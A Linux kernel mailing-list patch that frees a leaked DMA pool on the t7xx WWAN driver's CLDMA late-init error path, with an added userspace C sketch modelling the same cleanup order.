Thanks,
XIAOWU



* [PATCH] net: wwan: t7xx: destroy DMA pool on CLDMA late init failure
From: Haoxiang Li @ 2026-06-21  3:17 UTC (permalink / raw)
  To: chandrashekar.devegowda, haijun.liu, ricardo.martinez,
	loic.poulain, ryazanov.s.a, johannes, andrew+netdev, davem,
	edumazet, kuba, pabeni, ilpo.jarvinen
  Cc: netdev, linux-kernel, Haoxiang Li, stable

t7xx_cldma_late_init() creates md_ctrl->gpd_dmapool before
initializing the TX and RX rings. If any ring initialization
fails, the error path frees the already initialized rings but
leaves the DMA pool allocated.

Destroy md_ctrl->gpd_dmapool on the late-init failure path
to avoid leaking the DMA pool.
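
The unwind order described above can be sketched in plain userspace C.
This is only a model under stated assumptions: `struct ctrl_model`,
`ring_init_model()` and `late_init_model()` are hypothetical names,
`malloc()`/`free()` stand in for the DMA pool and ring allocations, and
the `fail_at` parameter exists purely to force a failure.

```c
#include <assert.h>
#include <stdlib.h>

#define NUM_RINGS 4

struct ctrl_model {
	void *pool;             /* stands in for md_ctrl->gpd_dmapool */
	void *ring[NUM_RINGS];  /* stands in for the TX/RX rings */
};

/* Hypothetical ring init: fails at index fail_at (pass -1 for no failure). */
static int ring_init_model(struct ctrl_model *c, int i, int fail_at)
{
	if (i == fail_at)
		return -1;
	c->ring[i] = malloc(16);
	return c->ring[i] ? 0 : -1;
}

/* Create the pool first, then the rings; undo both if any ring fails. */
static int late_init_model(struct ctrl_model *c, int fail_at)
{
	int i, ret = 0;

	assert(c != NULL);

	c->pool = malloc(64);
	if (!c->pool)
		return -1;

	for (i = 0; i < NUM_RINGS; i++) {
		ret = ring_init_model(c, i, fail_at);
		if (ret)
			goto err_free_rings;
	}
	return 0;

err_free_rings:
	/* Free the rings that were already set up, newest first. */
	while (i--) {
		free(c->ring[i]);
		c->ring[i] = NULL;
	}
	/* Release the pool as well and clear the stale pointer. */
	free(c->pool);
	c->pool = NULL;
	return ret;
}
```

Clearing the pointer after release means a later teardown path that
checks it sees NULL instead of a dangling pool.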

Fixes: 39d439047f1d ("net: wwan: t7xx: Add control DMA interface")
Cc: stable@vger.kernel.org
Signed-off-by: Haoxiang Li <haoxiang_li2024@163.com>
---
 drivers/net/wwan/t7xx/t7xx_hif_cldma.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
index e10cb4f9104e..2917cee9b802 100644
--- a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
+++ b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
@@ -1063,6 +1063,9 @@ static int t7xx_cldma_late_init(struct cldma_ctrl *md_ctrl)
 	while (i--)
 		t7xx_cldma_ring_free(md_ctrl, &md_ctrl->tx_ring[i], DMA_TO_DEVICE);
 
+	dma_pool_destroy(md_ctrl->gpd_dmapool);
+	md_ctrl->gpd_dmapool = NULL;
+
 	return ret;
 }
 
-- 
2.25.1

